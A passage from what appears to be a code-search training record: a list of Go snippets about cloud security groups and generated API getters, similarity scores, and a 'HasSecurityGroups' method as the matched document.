s.GroupName,\n\t\tGroupDescription: s.GroupDescription,\n\t}\n\n\tingresses := make([]IngressEgress, 0)\n\tfor _, i := range s.SecurityGroupIngress {\n\t\tingress := IngressEgress{\n\t\t\tIPProtocol: i.IpProtocol,\n\t\t\tDescription: i.Description,\n\t\t\tCidrIP: []string{i.CidrIp},\n\t\t\tCidrIpv6: []string{i.CidrIpv6},\n\t\t\tFromPort: i.FromPort,\n\t\t\tToPort: i.ToPort,\n\t\t}\n\t\tingresses = append(ingresses, ingress)\n\t}\n\tcf.SecurityGroupIngress = ingresses\n\n\tegresses := make([]IngressEgress, 0)\n\tfor _, e := range s.SecurityGroupEgress {\n\t\tegress := IngressEgress{\n\t\t\tIPProtocol: e.IpProtocol,\n\t\t\tDescription: e.Description,\n\t\t\tCidrIP: []string{e.CidrIp},\n\t\t\tCidrIpv6: []string{e.CidrIpv6},\n\t\t\tFromPort: e.FromPort,\n\t\t\tToPort: e.ToPort,\n\t\t}\n\t\tegresses = append(egresses, egress)\n\t}\n\tcf.SecurityGroupEgress = egresses\n\n\treturn []AWSResourceConfig{{\n\t\tResource: cf,\n\t\tMetadata: s.AWSCloudFormationMetadata,\n\t}}\n}", "func (o *ControllersUpdateStorageOptionsTemplateRequest) GetSecureOk() (*bool, bool) {\n\tif o == nil || o.Secure == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Secure, true\n}", "func (o *UpdateUserGroupsBadRequest) IsSuccess() bool {\n\treturn false\n}", "func (o *FiltersSecurityGroup) GetTagValuesOk() (*[]string, bool) {\n\tif o == nil || o.TagValues == nil {\n\t\treturn nil, false\n\t}\n\treturn o.TagValues, true\n}", "func (o *CloudAwsVirtualMachineAllOf) SetSecurityGroups(v []CloudAwsSecurityGroupRelationship) {\n\to.SecurityGroups = v\n}", "func (o *FiltersVmGroup) GetSubnetIdsOk() (*[]string, bool) {\n\tif o == nil || o.SubnetIds == nil {\n\t\treturn nil, false\n\t}\n\treturn o.SubnetIds, true\n}", "func (*ListSecurityGroupsRequest) Descriptor() ([]byte, []int) {\n\treturn file_yandex_cloud_vpc_v1_security_group_service_proto_rawDescGZIP(), []int{1}\n}", "func (o *UpdatesV3Request) GetSecurityOnlyOk() (*bool, bool) {\n\tif o == nil || o.SecurityOnly == nil {\n\t\treturn nil, false\n\t}\n\treturn o.SecurityOnly, true\n}", "func (o *UpdateUserGroupsOK) IsSuccess() bool {\n\treturn true\n}", "func Find(ec2Client aws.EC2API, nameTags []*string) ([]*SecurityGroup, error) {\n\tfilters := []*ec2.Filter{\n\t\t&ec2.Filter{\n\t\t\tName: to.Strp(\"tag-key\"),\n\t\t\tValues: []*string{to.Strp(\"Name\")},\n\t\t},\n\t\t&ec2.Filter{\n\t\t\tName: to.Strp(\"tag-value\"),\n\t\t\tValues: nameTags,\n\t\t},\n\t}\n\n\toutput, err := ec2Client.DescribeSecurityGroups(&ec2.DescribeSecurityGroupsInput{\n\t\tFilters: filters,\n\t\tMaxResults: to.Int64p(5), // Smallest allowed value returns\n\t})\n\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tsgs := newSGs(output.SecurityGroups)\n\tswitch len(sgs) {\n\tcase len(nameTags):\n\t\treturn sgs, nil\n\tdefault:\n\t\treturn nil, fmt.Errorf(\"Number of Security Groups %v/%v\", len(sgs), len(nameTags))\n\t}\n}", "func (o EciScalingConfigurationOutput) SecurityGroupId() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v *EciScalingConfiguration) pulumi.StringPtrOutput { return v.SecurityGroupId }).(pulumi.StringPtrOutput)\n}", "func (o *SecureScore) GetControlScoresOk() ([]AnyOfmicrosoftGraphControlScore, bool) {\n\tif o == nil || o.ControlScores == nil {\n\t\tvar ret []AnyOfmicrosoftGraphControlScore\n\t\treturn ret, false\n\t}\n\treturn *o.ControlScores, true\n}", "func (o *PcloudVolumegroupsGetBadRequest) IsSuccess() bool {\n\treturn false\n}", "func (s *DescribeMountTargetSecurityGroupsOutput) SetSecurityGroups(v []*string) *DescribeMountTargetSecurityGroupsOutput {\n\ts.SecurityGroups = v\n\treturn s\n}", "func (o ClusterNodeAttributeOutput) SecurityGroupId() pulumi.StringOutput {\n\treturn o.ApplyT(func(v ClusterNodeAttribute) string { return v.SecurityGroupId }).(pulumi.StringOutput)\n}", "func (o *SecureScore) GetEnabledServicesOk() ([]string, bool) {\n\tif o == nil || o.EnabledServices == nil {\n\t\tvar ret []string\n\t\treturn ret, false\n\t}\n\treturn *o.EnabledServices, true\n}" ]
[ "0.8232663", "0.7047844", "0.70013595", "0.68706304", "0.68588334", "0.651668", "0.647456", "0.61981946", "0.6160259", "0.6145392", "0.6071484", "0.6070678", "0.60376275", "0.60219413", "0.59867287", "0.59803146", "0.587398", "0.5838932", "0.58343804", "0.5832709", "0.58278936", "0.57407975", "0.57358885", "0.57230717", "0.56921643", "0.5672437", "0.56711924", "0.56328714", "0.5607093", "0.5593865", "0.5526562", "0.55233884", "0.54944384", "0.547686", "0.5474771", "0.54739624", "0.54727817", "0.54415756", "0.54344976", "0.5397777", "0.5396041", "0.5394092", "0.5392361", "0.53829724", "0.5379769", "0.5297968", "0.52928305", "0.52859765", "0.5283042", "0.52687114", "0.5265614", "0.5246522", "0.5232181", "0.52230805", "0.5220529", "0.52134144", "0.5200817", "0.5190173", "0.5136543", "0.5129705", "0.5114435", "0.5108879", "0.509051", "0.5055599", "0.50188494", "0.49938482", "0.49850792", "0.49773514", "0.49462038", "0.49450088", "0.49439675", "0.4940841", "0.49403003", "0.49385446", "0.49362168", "0.49311045", "0.49290013", "0.4915471", "0.4912682", "0.4907915", "0.49075228", "0.49048513", "0.48951787", "0.4877653", "0.48698", "0.4860959", "0.485105", "0.48497733", "0.48391291", "0.48328143", "0.4827123", "0.4826352", "0.48071873", "0.47998813", "0.47984928", "0.47954205", "0.47907853", "0.4785913", "0.47843423", "0.47816658" ]
0.77499956
1
HasSecurityGroups returns a boolean if a field has been set.
func (o *CloudAwsVirtualMachineAllOf) HasSecurityGroups() bool { if o != nil && o.SecurityGroups != nil { return true } return false }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (o *CreateLoadBalancerRequest) HasSecurityGroups() bool {\n\tif o != nil && o.SecurityGroups != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *FiltersSecurityGroup) HasSecurityGroupIds() bool {\n\tif o != nil && o.SecurityGroupIds != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *FiltersVmGroup) HasSecurityGroupIds() bool {\n\tif o != nil && o.SecurityGroupIds != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *SecurityGroup) HasSecurityGroupId() bool {\n\tif o != nil && o.SecurityGroupId != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *FiltersSecurityGroup) HasSecurityGroupNames() bool {\n\tif o != nil && o.SecurityGroupNames != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *SecurityGroup) HasSecurityGroupName() bool {\n\tif o != nil && o.SecurityGroupName != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (m SecurityListRequest) HasSecurityID() bool {\n\treturn m.Has(tag.SecurityID)\n}", "func (m SecurityListRequest) HasSecurityType() bool {\n\treturn m.Has(tag.SecurityType)\n}", "func (o *FiltersSecurityGroup) HasOutboundRuleSecurityGroupNames() bool {\n\tif o != nil && o.OutboundRuleSecurityGroupNames != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *FiltersSecurityGroup) HasInboundRuleSecurityGroupNames() bool {\n\tif o != nil && o.InboundRuleSecurityGroupNames != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (m SecurityListRequest) HasSecurityDesc() bool {\n\treturn m.Has(tag.SecurityDesc)\n}", "func (o *FiltersSecurityGroup) HasOutboundRuleSecurityGroupIds() bool {\n\tif o != nil && o.OutboundRuleSecurityGroupIds != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *FiltersSecurityGroup) HasInboundRuleSecurityGroupIds() bool {\n\tif o != nil && o.InboundRuleSecurityGroupIds != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (r Routes) HasSecurity() bool {\n\t_, ok := r[\"security\"]\n\treturn ok\n}", "func (o *UpdatesV3Request) HasSecurityOnly() bool {\n\tif o != nil && o.SecurityOnly != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (m SecurityListRequest) HasSecurityIDSource() bool {\n\treturn m.Has(tag.SecurityIDSource)\n}", "func (m SecurityListRequest) HasSecurityExchange() bool {\n\treturn m.Has(tag.SecurityExchange)\n}", "func (m OrderStatusRequest) HasSecurityType() bool {\n\treturn m.Has(tag.SecurityType)\n}", "func (o *FiltersSecurityGroup) HasDescriptions() bool {\n\tif o != nil && o.Descriptions != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (m OrderStatusRequest) HasSecurityID() bool {\n\treturn m.Has(tag.SecurityID)\n}", "func (m OrderStatusRequest) HasSecurityDesc() bool {\n\treturn m.Has(tag.SecurityDesc)\n}", "func (m OrderStatusRequest) HasSecurityDesc() bool {\n\treturn m.Has(tag.SecurityDesc)\n}", "func (o *MemoryPersistentMemoryConfiguration) HasSecurityState() bool {\n\tif o != nil && o.SecurityState != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *User) HasSchools() bool {\n\tif o != nil && o.Schools != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *SecurityGroup) HasInboundRules() bool {\n\tif o != nil && o.InboundRules != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (m SecurityListRequest) HasSecurityReqID() bool {\n\treturn m.Has(tag.SecurityReqID)\n}", "func (m SecurityListRequest) HasSecurityListRequestType() bool {\n\treturn m.Has(tag.SecurityListRequestType)\n}", "func (o *CreateLoadBalancerRequest) GetSecurityGroups() []string {\n\tif o == nil || o.SecurityGroups == nil {\n\t\tvar ret []string\n\t\treturn ret\n\t}\n\treturn *o.SecurityGroups\n}", "func (m OrderStatusRequest) HasSecurityExchange() bool {\n\treturn m.Has(tag.SecurityExchange)\n}", "func (o *CreateLoadBalancerRequest) GetSecurityGroupsOk() (*[]string, bool) {\n\tif o == nil || o.SecurityGroups == nil {\n\t\treturn nil, false\n\t}\n\treturn o.SecurityGroups, true\n}", "func (o *ControllersUpdateStorageOptionsTemplateRequest) HasSecure() bool {\n\tif o != nil && o.Secure != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (m CrossOrderCancelReplaceRequest) HasSecurityType() bool {\n\treturn m.Has(tag.SecurityType)\n}", "func (m CrossOrderCancelReplaceRequest) HasSecurityID() bool {\n\treturn m.Has(tag.SecurityID)\n}", "func (o *SecurityGroup) HasOutboundRules() bool {\n\tif o != nil && o.OutboundRules != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *MicrosoftGraphEducationUser) HasSchools() bool {\n\tif o != nil && o.Schools != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *SecurityGroup) HasDescription() bool {\n\tif o != nil && o.Description != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *W2) HasSocialSecurityWages() bool {\n\tif o != nil && o.SocialSecurityWages.IsSet() {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *FiltersSecurityGroup) HasNetIds() bool {\n\tif o != nil && o.NetIds != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *CreateLoadBalancerRequest) SetSecurityGroups(v []string) {\n\to.SecurityGroups = &v\n}", "func (m SecurityListRequest) HasCreditRating() bool {\n\treturn m.Has(tag.CreditRating)\n}", "func (az *AzK8sConstraintTemplate) HasSecurityPolicies() (*bool, error) {\n\tc, err := az.getConstraints()\n\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif c != nil && len(*c) > 0 {\n\t\treturn utils.BoolPtr(true), nil\n\t}\n\treturn utils.BoolPtr(false), nil\n}", "func (m MarketDataSnapshotFullRefresh) HasSecurityType() bool {\n\treturn m.Has(tag.SecurityType)\n}", "func (m CrossOrderCancelReplaceRequest) HasSecurityDesc() bool {\n\treturn m.Has(tag.SecurityDesc)\n}", "func (m CrossOrderCancelReplaceRequest) HasSecurityIDSource() bool {\n\treturn m.Has(tag.SecurityIDSource)\n}", "func (c *Config) IsSecurityEnabled() bool {\n\tval, ok := c.backend.Lookup(\"client.BCCSP.security.enabled\")\n\tif !ok {\n\t\treturn defEnabled\n\t}\n\treturn cast.ToBool(val)\n}", "func (m CrossOrderCancelReplaceRequest) HasSecurityExchange() bool {\n\treturn m.Has(tag.SecurityExchange)\n}", "func (o *SecurityGroup) HasTags() bool {\n\tif o != nil && o.Tags != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (instance *Host) EnableSecurityGroup(ctx context.Context, sg resources.SecurityGroup) (ferr fail.Error) {\n\tdefer fail.OnPanic(&ferr)\n\n\tif valid.IsNil(instance) {\n\t\treturn fail.InvalidInstanceError()\n\t}\n\tif ctx == nil {\n\t\treturn fail.InvalidParameterError(\"ctx\", \"cannot be nil\")\n\t}\n\tif sg == nil {\n\t\treturn fail.InvalidParameterError(\"sg\", \"cannot be null value of 'SecurityGroup'\")\n\t}\n\n\thid, err := instance.GetID()\n\tif err != nil {\n\t\treturn fail.ConvertError(err)\n\t}\n\n\tsgName := sg.GetName()\n\n\t// instance.Lock()\n\t// defer instance.Unlock()\n\n\tsvc := instance.Service()\n\txerr := instance.Alter(ctx, func(_ data.Clonable, props *serialize.JSONProperties) fail.Error {\n\t\treturn props.Inspect(hostproperty.SecurityGroupsV1, func(clonable data.Clonable) fail.Error {\n\t\t\thsgV1, ok := clonable.(*propertiesv1.HostSecurityGroups)\n\t\t\tif !ok {\n\t\t\t\treturn fail.InconsistentError(\"'*propertiesv1.HostSecurityGroups' expected, '%s' provided\", reflect.TypeOf(clonable).String())\n\t\t\t}\n\n\t\t\tvar asg *abstract.SecurityGroup\n\t\t\txerr := sg.Inspect(ctx, func(clonable data.Clonable, _ *serialize.JSONProperties) fail.Error {\n\t\t\t\tvar ok bool\n\t\t\t\tif asg, ok = clonable.(*abstract.SecurityGroup); !ok {\n\t\t\t\t\treturn fail.InconsistentError(\"'*abstract.SecurityGroup' expected, '%s' provided\", reflect.TypeOf(clonable).String())\n\t\t\t\t}\n\n\t\t\t\treturn nil\n\t\t\t})\n\t\t\txerr = debug.InjectPlannedFail(xerr)\n\t\t\tif xerr != nil {\n\t\t\t\treturn xerr\n\t\t\t}\n\n\t\t\t// First check if the security group is not already registered for the Host with the exact same state\n\t\t\tvar found bool\n\t\t\tfor k := range hsgV1.ByID {\n\t\t\t\tif k == asg.ID {\n\t\t\t\t\tfound = true\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t}\n\t\t\tif !found {\n\t\t\t\treturn fail.NotFoundError(\"security group '%s' is not bound to Host '%s'\", sgName, hid)\n\t\t\t}\n\n\t\t\t{\n\t\t\t\t// Bind the security group on provider side; if already bound (*fail.ErrDuplicate), considered as a success\n\t\t\t\txerr = svc.BindSecurityGroupToHost(ctx, asg, hid)\n\t\t\t\txerr = debug.InjectPlannedFail(xerr)\n\t\t\t\tif xerr != nil {\n\t\t\t\t\tswitch xerr.(type) {\n\t\t\t\t\tcase *fail.ErrDuplicate:\n\t\t\t\t\t\tdebug.IgnoreError2(ctx, xerr)\n\t\t\t\t\tdefault:\n\t\t\t\t\t\treturn xerr\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\n\t\t\t// found and updated, update metadata\n\t\t\thsgV1.ByID[asg.ID].Disabled = false\n\t\t\treturn nil\n\t\t})\n\t})\n\tif xerr != nil {\n\t\treturn xerr\n\t}\n\n\treturn nil\n}", "func (o *W2) HasSocialSecurityTips() bool {\n\tif o != nil && o.SocialSecurityTips.IsSet() {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *User) HasOnPremisesSecurityIdentifier() bool {\n\tif o != nil && o.OnPremisesSecurityIdentifier != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (m MarketDataSnapshotFullRefresh) HasSecurityDesc() bool {\n\treturn m.Has(tag.SecurityDesc)\n}", "func (m MarketDataSnapshotFullRefresh) HasSecurityID() bool {\n\treturn m.Has(tag.SecurityID)\n}", "func (o *CloudAwsVirtualMachineAllOf) GetSecurityGroupsOk() ([]CloudAwsSecurityGroupRelationship, bool) {\n\tif o == nil || o.SecurityGroups == nil {\n\t\treturn nil, false\n\t}\n\treturn o.SecurityGroups, true\n}", "func (m SecurityListRequest) HasRepoCollateralSecurityType() bool {\n\treturn m.Has(tag.RepoCollateralSecurityType)\n}", "func (o *FiltersSecurityGroup) HasInboundRuleToPortRanges() bool {\n\tif o != nil && o.InboundRuleToPortRanges != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (instance *Host) ListSecurityGroups(ctx context.Context, state securitygroupstate.Enum) (list []*propertiesv1.SecurityGroupBond, ferr fail.Error) {\n\tdefer fail.OnPanic(&ferr)\n\n\tif valid.IsNil(instance) {\n\t\treturn nil, fail.InvalidInstanceError()\n\t}\n\n\t// instance.RLock()\n\t// defer instance.RUnlock()\n\n\txerr := instance.Inspect(ctx, func(_ data.Clonable, props *serialize.JSONProperties) fail.Error {\n\t\treturn props.Inspect(hostproperty.SecurityGroupsV1, func(clonable data.Clonable) fail.Error {\n\t\t\thsgV1, ok := clonable.(*propertiesv1.HostSecurityGroups)\n\t\t\tif !ok {\n\t\t\t\treturn fail.InconsistentError(\"'*propertiesv1.HostSecurityGroups' expected, '%s' provided\", reflect.TypeOf(clonable).String())\n\t\t\t}\n\n\t\t\tlist = FilterBondsByKind(hsgV1.ByID, state)\n\t\t\treturn nil\n\t\t})\n\t})\n\txerr = debug.InjectPlannedFail(xerr)\n\tif xerr != nil {\n\t\treturn nil, xerr\n\t}\n\n\treturn list, nil\n}", "func (o *SecurityGroup) HasNetId() bool {\n\tif o != nil && o.NetId != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *FiltersSecurityGroup) HasInboundRuleProtocols() bool {\n\tif o != nil && o.InboundRuleProtocols != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *FiltersSecurityGroup) HasOutboundRuleFromPortRanges() bool {\n\tif o != nil && o.OutboundRuleFromPortRanges != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (d UserData) HasGroups() bool {\n\treturn d.ModelData.Has(models.NewFieldName(\"Groups\", \"group_ids\"))\n}", "func (m SecurityListRequest) HasCurrency() bool {\n\treturn m.Has(tag.Currency)\n}", "func (o *FiltersSecurityGroup) HasInboundRuleFromPortRanges() bool {\n\tif o != nil && o.InboundRuleFromPortRanges != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (m SecurityListRequest) HasEncodedSecurityDesc() bool {\n\treturn m.Has(tag.EncodedSecurityDesc)\n}", "func (h *HsaCoHeader) EnableSgprWorkGroupInfo() bool {\n\treturn extractBits(h.ComputePgmRsrc2, 10, 10) != 0\n}", "func (o *Invitation) HasRoles() bool {\n\tif o != nil && o.Roles != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (m SecurityListRequest) HasSubscriptionRequestType() bool {\n\treturn m.Has(tag.SubscriptionRequestType)\n}", "func (o *FiltersSecurityGroup) HasInboundRuleIpRanges() bool {\n\tif o != nil && o.InboundRuleIpRanges != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *FiltersVmGroup) HasSubnetIds() bool {\n\tif o != nil && o.SubnetIds != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (m SecurityListRequest) HasIssuer() bool {\n\treturn m.Has(tag.Issuer)\n}", "func (o *FiltersSecurityGroup) HasOutboundRuleIpRanges() bool {\n\tif o != nil && o.OutboundRuleIpRanges != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (m MarketDataSnapshotFullRefresh) HasSecurityExchange() bool {\n\treturn m.Has(tag.SecurityExchange)\n}", "func (mr *MockClientMockRecorder) DescribeSecurityGroups(arg0 interface{}) *gomock.Call {\n\tmr.mock.ctrl.T.Helper()\n\treturn mr.mock.ctrl.RecordCallWithMethodType(mr.mock, \"DescribeSecurityGroups\", reflect.TypeOf((*MockClient)(nil).DescribeSecurityGroups), arg0)\n}", "func (o *StoragePhysicalDisk) HasSecured() bool {\n\tif o != nil && o.Secured != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *LogsPipelineProcessor) HasIsEnabled() bool {\n\tif o != nil && o.IsEnabled != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *User) HasSkills() bool {\n\tif o != nil && o.Skills != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *StorageHitachiPortAllOf) HasPortLunSecurity() bool {\n\tif o != nil && o.PortLunSecurity != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (mr *MockSecurityGroupServiceIfaceMockRecorder) ListSecurityGroups(p interface{}) *gomock.Call {\n\tmr.mock.ctrl.T.Helper()\n\treturn mr.mock.ctrl.RecordCallWithMethodType(mr.mock, \"ListSecurityGroups\", reflect.TypeOf((*MockSecurityGroupServiceIface)(nil).ListSecurityGroups), p)\n}", "func (o *CreateLoadBalancerRequest) HasSubnets() bool {\n\tif o != nil && o.Subnets != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *FiltersSecurityGroup) HasOutboundRuleToPortRanges() bool {\n\tif o != nil && o.OutboundRuleToPortRanges != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *FiltersSecurityGroup) HasOutboundRuleProtocols() bool {\n\tif o != nil && o.OutboundRuleProtocols != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *FiltersNatService) HasSubnetIds() bool {\n\tif o != nil && o.SubnetIds != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *FiltersSecurityGroup) HasTags() bool {\n\tif o != nil && o.Tags != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *StoragePhysicalDiskAllOf) HasSecured() bool {\n\tif o != nil && o.Secured != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *ProcessGroupsEntity) HasProcessGroups() bool {\n\tif o != nil && o.ProcessGroups != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *User) HasLicenseDetails() bool {\n\tif o != nil && o.LicenseDetails != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *MicrosoftGraphEducationUser) HasStudent() bool {\n\tif o != nil && o.Student != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *User) HasCalendarGroups() bool {\n\tif o != nil && o.CalendarGroups != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *SecureScore) HasEnabledServices() bool {\n\tif o != nil && o.EnabledServices != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *SecureScore) HasControlScores() bool {\n\tif o != nil && o.ControlScores != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (m SecurityListRequest) HasInstrRegistry() bool {\n\treturn m.Has(tag.InstrRegistry)\n}", "func (o *SamlConfigurationProperties) HasAddGroupMemberships() bool {\n\tif o != nil && o.AddGroupMemberships != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (instance *Host) DisableSecurityGroup(ctx context.Context, sgInstance resources.SecurityGroup) (ferr fail.Error) {\n\tdefer fail.OnPanic(&ferr)\n\n\tif valid.IsNil(instance) {\n\t\treturn fail.InvalidInstanceError()\n\t}\n\tif ctx == nil {\n\t\treturn fail.InvalidParameterError(\"ctx\", \"cannot be nil\")\n\t}\n\tif sgInstance == nil {\n\t\treturn fail.InvalidParameterError(\"sgInstance\", \"cannot be nil\")\n\t}\n\n\tsgName := sgInstance.GetName()\n\tsgID, err := sgInstance.GetID()\n\tif err != nil {\n\t\treturn fail.ConvertError(err)\n\t}\n\n\thid, err := instance.GetID()\n\tif err != nil {\n\t\treturn fail.ConvertError(err)\n\t}\n\n\tsvc := instance.Service()\n\txerr := instance.Alter(ctx, func(_ data.Clonable, props *serialize.JSONProperties) fail.Error {\n\t\treturn props.Alter(hostproperty.SecurityGroupsV1, func(clonable data.Clonable) fail.Error {\n\t\t\thsgV1, ok := clonable.(*propertiesv1.HostSecurityGroups)\n\t\t\tif !ok {\n\t\t\t\treturn fail.InconsistentError(\"'*propertiesv1.HostSecurityGroups' expected, '%s' provided\", reflect.TypeOf(clonable).String())\n\t\t\t}\n\n\t\t\tvar asg *abstract.SecurityGroup\n\t\t\txerr := sgInstance.Inspect(ctx, func(clonable data.Clonable, _ *serialize.JSONProperties) fail.Error {\n\t\t\t\tvar ok bool\n\t\t\t\tif asg, ok = clonable.(*abstract.SecurityGroup); !ok {\n\t\t\t\t\treturn fail.InconsistentError(\"'*abstract.SecurityGroup' expected, '%s' provided\", reflect.TypeOf(clonable).String())\n\t\t\t\t}\n\n\t\t\t\treturn nil\n\t\t\t})\n\t\t\txerr = debug.InjectPlannedFail(xerr)\n\t\t\tif xerr != nil {\n\t\t\t\treturn xerr\n\t\t\t}\n\n\t\t\t// First check if the security group is not already registered for the Host with the exact same state\n\t\t\tvar found bool\n\t\t\tfor k := range hsgV1.ByID {\n\t\t\t\tif k == asg.ID {\n\t\t\t\t\tfound = true\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t}\n\t\t\tif !found {\n\t\t\t\treturn fail.NotFoundError(\"security group '%s' is not bound to Host '%s'\", sgName, sgID)\n\t\t\t}\n\n\t\t\t{\n\t\t\t\t// Bind the security group on provider side; if security group not binded, considered as a success\n\t\t\t\txerr = svc.UnbindSecurityGroupFromHost(ctx, asg, hid)\n\t\t\t\txerr = debug.InjectPlannedFail(xerr)\n\t\t\t\tif xerr != nil {\n\t\t\t\t\tswitch xerr.(type) {\n\t\t\t\t\tcase *fail.ErrNotFound:\n\t\t\t\t\t\tdebug.IgnoreError2(ctx, xerr)\n\t\t\t\t\t\t// continue\n\t\t\t\t\tdefault:\n\t\t\t\t\t\treturn xerr\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\n\t\t\t// found, update properties\n\t\t\thsgV1.ByID[asg.ID].Disabled = true\n\t\t\treturn nil\n\t\t})\n\t})\n\tif xerr != nil {\n\t\treturn xerr\n\t}\n\n\treturn nil\n}", "func (o *CloudAwsVirtualMachineAllOf) SetSecurityGroups(v []CloudAwsSecurityGroupRelationship) {\n\to.SecurityGroups = v\n}", "func (g ScimGroup) HasRole(role string) bool {\n\tfor _, groupRole := range g.Roles {\n\t\tif groupRole.Value == role {\n\t\t\treturn true\n\t\t}\n\t}\n\treturn false\n}", "func (o *FiltersSecurityGroup) HasAccountIds() bool {\n\tif o != nil && o.AccountIds != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (s *DefaultSpaceSettings) SetSecurityGroups(v []*string) *DefaultSpaceSettings {\n\ts.SecurityGroups = v\n\treturn s\n}", "func (p *Plugin) HasGroupExpression(user *security.User, resourceTenant string, groupExpression grp.GroupExpression) bool {\n\n\t// no resource tenant is not ok, there can be no default on this layer\n\tif resourceTenant == \"\" {\n\t\treturn false\n\t}\n\n\t// what we have now is the slice of groups that the user has\n\t// (including \"on behalf\", with concrete cluster-tenant or wildcard \"all\")\n\t// \"on behalf\"-groups do not have cluster-tenant because it is already evaluated for the concrete tenant to act\n\n\tfor i := range user.Groups {\n\t\tgrpCtx, err := p.grpr.ParseGroupName(string(user.Groups[i]))\n\t\tif err != nil {\n\t\t\tcontinue\n\t\t}\n\n\t\t// check if group maches for any of the tenants\n\t\tif resourceTenant == grp.Any {\n\t\t\tif groupExpression.Matches(*grpCtx) {\n\t\t\t\treturn true\n\t\t\t}\n\t\t\tcontinue\n\t\t}\n\t\t// resource belongs to own tenant\n\t\tif strings.EqualFold(user.Tenant, resourceTenant) && grpCtx.OnBehalfTenant == \"\" {\n\t\t\tif groupExpression.Matches(*grpCtx) {\n\t\t\t\treturn true\n\t\t\t}\n\t\t\tcontinue\n\t\t}\n\t\t// resource belongs to other tenant, access \"on behalf\": if group is for resource-tenant or for \"all\" then check\n\t\tif strings.EqualFold(grpCtx.OnBehalfTenant, resourceTenant) || grpCtx.OnBehalfTenant == grp.All {\n\t\t\tif groupExpression.Matches(*grpCtx) {\n\t\t\t\treturn true\n\t\t\t}\n\t\t\tcontinue\n\t\t}\n\t}\n\n\treturn false\n\n}", "func (o *Permissao) HasIsGroup() bool {\n\tif o != nil && o.IsGroup != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (s *UserSettings) SetSecurityGroups(v []*string) *UserSettings {\n\ts.SecurityGroups = v\n\treturn s\n}", "func (o *MicrosoftGraphWindows10CompliancePolicy) HasSecureBootEnabled() bool {\n\tif o != nil && o.SecureBootEnabled != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}" ]
